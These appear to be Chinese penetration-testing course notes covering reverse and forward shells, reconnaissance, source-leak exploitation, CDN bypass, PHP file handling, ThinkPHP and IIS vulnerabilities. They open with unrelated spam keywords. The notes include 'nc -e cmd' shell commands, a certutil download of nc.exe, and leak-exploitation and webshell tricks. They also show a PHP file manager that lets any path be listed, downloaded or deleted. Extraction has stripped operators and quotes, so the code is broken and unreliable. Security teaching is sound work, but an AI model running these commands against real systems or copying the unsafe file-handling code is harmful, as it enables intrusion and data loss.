做网站寄生虫需要哪些东西,做网站视频学什么专业,建设集团招工信息网站,万维网的网站小迪安全v2023笔记 1-18
棱角社区 文章目录 1. 基础入门1. 正向shell与反向shell2. web应用3. 抓包#xff0c;封包#xff0c;协议#xff0c;app#xff0c;小程序#xff0c;pc应用#xff0c;web应用 2. 信息打点1. 常见信息获取2. 文件泄露3. 常见阻碍4. CDN绕过封包协议app小程序pc应用web应用 2. 信息打点1. 常见信息获取2. 文件泄露3. 常见阻碍4. CDN绕过漏洞回链5. app抓包封包xp框架反编译6. 红队工具篇 3. php应用1. 文件操作2. js中的ajax请求3. thinkphp框架1. 下载安装与基本使用2. 新建控制器3. 新建模块4. 数据库操作5. thinkphp查看漏洞 4.asp,IIS(过时) 1. 基础入门
POCproof of concept概念验证代码用来证明漏洞存在。
EXPexploit利用漏洞进行攻击的动作。
Payload有效载荷指的是成功执行payload后真正在目标系统执行的代码或指令。
Shellcodeshell代码是payload的一种由于其建立正向shell/反向shell而得名。
1. 正向shell与反向shell
防火墙出站宽松入站严入站一般要关防火墙。
b去连接a对于a来说是入站为反向shell。
a去连接b对于a来说是出站为正向shell。
a去连接b
b作为服务器监听
nc -lvvp 5566
a连接到服务器并完成正向shell
nc -e cmd 192.168.10.8 5566
有时候要让靶机执行命令下载一个nc.exe。(目的文件名n.exe)
certutil.exe -urlcache -split -f http://www.xiaodi8.com:80/nc.exe n.exe虚拟机连接主机主机可以执行dir查看虚拟机目录。
2. web应用
开发语言
程序源码应用类型分类开源cms分类(比如wordpress)开发框架分类等。
中间件iisapachenginxtomcatweblogicjboosglasshfish。
数据库accessmysqlmssqloracledb2sybaseredismongodb。
第三方软件phpmyadminvs-ftpdvncelkopenssh
常见漏洞rce远程命令执行xss跨站csrf/ssrf/crlf反序列化越权未授权访问xxe/xmlsql。
3. 抓包封包协议app小程序pc应用web应用
安装雷电模拟器
app有web协议小程序pc抓包http/s数据-charlesfidderburpsuite
程序进程网络接口其他协议-wireshark科来网络分析系统、TCPDump(linux)。
通讯类应用封包分析发送接收-wpe四件套封包(apk-ccproxy-wpe监控cc进程)
需要给浏览器安装工具证书
封包能精确到每个操作的数据包。
2. 信息打点
www.baidu.com
顶级域名(一级域名)com
二级域名baidu
三级域名www
1. 常见信息获取
icp备案查询
查网站搭建cms识别云悉指纹
数据库常见端口
mysql 3306
mssql 1433
oracle 1521
redis 6379
sql server 1433
mongoDB 27017
RDP 远程桌面 3389
操作系统
大小写linux对大小写敏感
TTL值ping 127.0.0.1
Windows NT/2000TTL值为128。Windows 95/98TTL值为32。UNIXTTL值为255。LinuxTTL值为64。Windows 7TTL值也为64。
2. 文件泄露
git泄露githack
python githack.py http://127.0.0.1:80/.git/
svn泄露svnhack
git clone https://github.com/callmefeifei/SvnHack.git 克隆到当前目录
python svnhack.py -u http://127.0.0.1:80/.svn/entries --download
ds_store 文件泄露
漏洞利用工具ds_store_exp
python ds_store_exp.py http://127.0.0.1:80/.DS_Store
php的composer.json泄露
/composer.json
3. 常见阻碍
站库分离网站与数据库分离数据库为远程数据库
CDN加速CDN加速通过在全球各地分布的服务器网络上存储网站、应用程序和媒体文件的副本来实现加速效果。当用户请求访问某个网站或应用程序时CDN会根据用户的地理位置和网络条件将内容从离用户最近的服务器上提供从而减少了延迟和加载时间。
负载均衡分摊到多个操作单元上进行执行可能拿到备用机的权限。
WAF应用防火墙WAF检查每一个传入的数据包的内容来检测SQL注入、跨站点脚本、会话劫持、篡改参数或URL等类型的攻击。
主机防护防火墙比如服务器安全狗。
CDN内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节使内容传输得更快、更稳定。
4. CDN绕过漏洞回链
传统访问用户访问域名-解析服务器IP-访问目标主机
普通CDN用户访问域名-CDN节点-真实服务器I-访问目标主机
带WAF的CDN用户访问域名-CDN节点WAF-真实服务器IP-访问目标主机
CDN配置
加速域名需要启动加速的域名
加速区域需要启动加速的地区
加速类型需要启动加速的资源
nslookup baidu.com 多个ip
不同地方ping的ip不同
CDN绕过
服务器存在ssrf漏洞会向你的网站发起请求你的网站会记录访问的真实ip。
子域名没有cdn加速比如只加速了www.xxx.comtest.xxx.com没加速。使用超级ping会发现子域名指向同一个ip。查sp910.com发现IP同一个。
接口查询国外访问国外没cdn加速。
mx记录邮件交换记录或邮件没有cdn加速
主动邮件配合备案
常用网站
get-site-ip.com 不准确
备案查询
https://ping.chinaz.com/
常用工具
fuckcdn
通过本机的cmd获取本地访问该域名的ip地址并写入工具中端口为80
CDN绑定
windows\system32\drivers\etc\hosts 域名指向修改文件
5. app抓包封包xp框架反编译
外在抓包比如burpsuitefiddler等。
内在提取源代码中提取。
appinfoscanner对app里的urlip地址关键字进行采集
python3 app.py andriod -i ./test.apk
查壳工具pkid
脱壳工具
andriodxposed模块dexdumpfrida模块frida-dexdump
ios
frida模块
windows使用frida-ipa-dump
macOS使用frida-ios-dump
6. 红队工具篇
fofa .so
shodan search engine
zoomeye.org 知道创宇
https://quake.360.net/quake/#/index
自动化项目
http://github.com/knownsec/Kunyu
https://github.com/0x727/ShuiZe_0x727
https://github.com/Aabyss-Team/ARL?tabreadme-ov-file 灯塔arl
单点项目
子域名 oneforall
企查查 enscan
指纹识别 finger
3. php应用
默认之前使用过phpstudy编写搭建网站。
1. 文件操作
php超级全局变量$_FILES
$_FILES[表单值][name] 获取上传文件原始名称
$_FILES[表单值][type] 获取上传文件MIME类型
$_FILES[表单值][size] 获取上传文件字节单位大小
$_FILES[表单值][tmp_name] 获取上传的临时副本文件名
$_FILES[表单值][error] 获取上传时发生的错误代码php目录访问
is_dir() 函数用于检查指定的路径是否是一个目录
opendir() 函数用于打开指定的目录返回句柄用来读取目录中的文件和子目录
readdir() 函数用于从打开的目录句柄中读取目录中的文件和子目录
open_basedirPHP.INI中的设置用来控制脚本程序访问目录
ini_set(open_basedir,__DIR__); 设置配置文件中只能访问本目录文件显示
?php
// 获取路径参数如果未提供则默认为当前目录
$path $_GET[path] ? $_GET[path]: ./;// 定义获取文件列表的函数
function getlist($path){$hdopendir($path);$listarray();while(($file_namereaddir($hd))!False){// 排除当前目录和父目录if ($file_name ! . $file_name ! ..) {$file_path$path/$file_name;// 构建文件完整路径$file_typefiletype($file_path);//$file_type为file或dir$list[$file_type][]array(file_name $file_name, // 文件名存储键值file_path $file_path, // 文件路径存储键值file_size round(filesize($file_path) / 1024), // 通过换算文件大小存储键值file_time date(Y/m/d H:i:s,filemtime($file_path))// 获取文件时间并存储键值);}}// 关闭目录句柄closedir($hd);// 返回文件列表数组return $list;
}// 调用函数获取文件列表
$list getlist($path);
print_r($list) ;
?文件上传保存
jkloli目录
index.html
index.php
test.php
index.html
!DOCTYPE html
headmeta charsetutf-8title文件上传/title
/head
bodyform methodPOST actiontest.php enctypemultipart/form-datalabel forfileinput typefile namefile idfile accept.txtbrinput typesubmit value上传文件/form
/bodyindex.php
?php
include_once(index.html);test.php
php pathinfo函数 PATHINFO_DIRNAME: 目录路径 PATHINFO_BASENAME: 文件名包含扩展名 PATHINFO_EXTENSION: 文件后缀名 PATHINFO_FILENAME: 不包含后缀的文件名
?php
$uploadDir./uploads;
if(!file_exists($uploadDir)){mkdir($uploadDir);//创建目录
}
if($_SERVER[REQUEST_METHOD]POSTisset($_FILES[file])){$namebasename($_FILES[file][name]);//basename去掉文件名前的路径$tmpname$_FILES[file][tmp_name];$extpathinfo($name,PATHINFO_EXTENSION);//获取扩展名if(in_array($ext,[txt,md])){if(move_uploaded_file($tmpname,$uploadDir./$name)){echoscriptalert(上传成功)/script ;}else{echo 上传失败;}}else{echo 文件类型不符合;}
}else{echo没有上传;
}文件下载与删除
通过修改http头实现
?php
// 接受方法 判断是怎么操作
switch ($action){case del:unlink($file);// 如果操作为删除则调用unlink函数删除指定文件break;case down:header(Content-Type: application/octet-stream);// 设置响应内容的类型为二进制流告知浏览器这是一个文件下载header(Content-Disposition: attachment; filename\ .$file.\);// 设置浏览器提示下载并指定下载文件的名称使用 $file 变量header(Content-Length: . filesize($file));// 设置响应内容的长度为文件大小告知浏览器文件的实际大小readfile($file);// 读取并输出文件内容将文件内容发送给浏览器break;
}
?2. js中的ajax请求
AJAX 技术通过在后台发送异步 HTTP 请求并接收响应使得用户能够在不刷新整个页面的情况下获取更新后的数据。
js jquery库的ajax请求
请求-返回-读取返回的数据-js ajax代码进行解析-结果
php
请求-返回-返回结果
使用phpstudy搭建网站 test.php作为后端
?php
if ($_SERVER[REQUEST_METHOD]POST) {if($_POST[name]张三$_POST[age]9000){echo json_encode(array(code200,infocode1));}else{echo json_encode(array(code200,infocode0));}}index.html作为前端
!DOCTYPE html
headmeta charsetutf-8titlejquery test/titlescript src./jquery-3.7.1.js//引入jquery/script
/head
bodyscript$(document).ready(function() { // 确保DOM加载完成后再绑定事件$(button).on(click,function(){// 绑定button的点击事件$.ajax({type:POST,url:test.php,//localhost:80/jkloli/test.phpdataType:json,data:{name:$(.name).val(),//使用类选择器获取输入框的值age:$(.age).val()},success:function(res){if(res.infocode1){alert(验证成功);}else{alert(验证失败);}},error:function(jqXHR, textStatus, errorThrown){// 构建错误信息字符串 alert(失败: textStatus , errorThrown);}})});});/scriptlabel fornamename:/labelinput typetext idname classnamelabel forageage:/labelinput typetext idage classagebutton提交/button
/body失败弹窗
失败: parsererror, SyntaxError: Unexpected end of JSON input
3. thinkphp框架
1. 下载安装与基本使用
在WWW目录下下载thinkphp框架
git clone -b 5.1 https://gitee.com/liu21st/thinkphp.git thinkphp5.1
cd thinkphp5.1
git clone -b 5.1 https://gitee.com/liu21st/framework.git thinkphpthinkphp5.1对应php5.6 下面我们来看看它的结构 下面来访问一下sorry函数 它的url结构http://serverName/index.php/模块/控制器/操作/[参数名/参数值...]
2. 新建控制器
在application/index/controller下新建cc.php
访问urllocalhost/thinkphp5.1/public/index.php/index/cc/sayhi
?php
namespace app\index\controller;
use think\Controller;
use think\Db;
class cc extends Controller
{public function sayhi(){return hi;}
}3. 新建模块
将index/controller下的index.php复制到jkloli/controller目录里
修改命名空间为namespace app\jkloli\controller;
jkloli/controller目录下新建Jk.php
?php
namespace app\jkloli\controller;
use think\Controller;
use think\Db;class Jk extends Controller
{public function cllsse(){echo cllsse;}
}thinkphp很不稳定路径有时候可以访问有时候不能访问。不能访问时把phpstudy关了过一会再开试试。 4. 数据库操作
我用的是mysql8.0
首先在navicat中修改root用户的插件为mysql_native_password然后重新输入密码。
然后设置mysql的默认字符集为老版本的utf8具体操作如下
打开C:\Program Files\MySQL\MySQL Server 8.0\my.ini[mysqld] character-set-server utf8 default_authentication_plugin mysql_native_password打开计算机管理找到mysql80关闭重启。若重启失败尝试netstat -ano |findstr :3306查看端口占用taskkill /pid xxx -f。若端口没被占用则是my.ini的问题。
thinkphp开调试模式/config/app.php里app_debug改为true。
找到/config/database.php修改数据库配置信息。
修改Jk.php
?php
namespace app\jkloli\controller;
use think\Controller;
use think\Db;class Jk extends Controller
{public function cllsse(){echo cllsse;}public function ss(){if(input(?get.id)input(?get.username)){//检查参数是否存在$idinput(get.id);$usernameinput(get.username);$data db(t_user)-where(id,,$id)-where(username,,$username)不等于exp表达式-select();print_r($data);}else{echo 请使用get请求?idxxusernamexx;}}
}5. thinkphp查看漏洞
thinkphp看版本-看报错页面看THINK_VERSION全局变量看url地址构造
?mHomecIndexafunc1
m模块c控制器a方法
然后通过版本找历史漏洞
https://github.com/mochazz/thinkphp-vuln?tabreadme-ov-file
4.asp,IIS(过时)
ACCESS数据库无管理帐号密码顶级架构为表名列名字段数据所以在注入猜解中一般采用字典猜解表和列再获取数据猜解简单但又可能出现猜解不到的情况由于Access数据库在当前安全发展中已很少存在故直接使用SQLMAP注入。
IIS短文件名漏洞
此漏洞实际是由HTTP请求中旧DOS 8.3名称约定(SFN)的代字符(~)波浪号引起的。它允许远程攻击者在Web根目录下公开文件和文件夹名称(不应该可被访问)。攻击者可以找到通常无法从外部直接访问的重要文件,并获取有关应用程序基础结构的信息。
利用工具
https://github.com/irsdl/IIS-ShortName-Scanner
https://github.com/lijiejie/IIS_shortname_Scanner
IIS文件解析
IIS 6 解析漏洞
该版本默认会将*.asp;.jpg 此种格式的文件名当成Asp解析该版本默认会将*.asp/目录下的所有文件当成Asp解析。如logo.asp;.jpg xx.asp/logo.jpg
IIS 7.x 解析漏洞
在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为php文件应用场景配合文件上传获取Webshell
IIS写权限漏洞
IIS6.0 目录权限开启写入开启WebDAV设置为允许
参考利用https://cloud.tencent.com/developer/article/2050105
http options请求获取服务器允许的 http 方法
put请求向服务器添加文件
move请求将文件改名
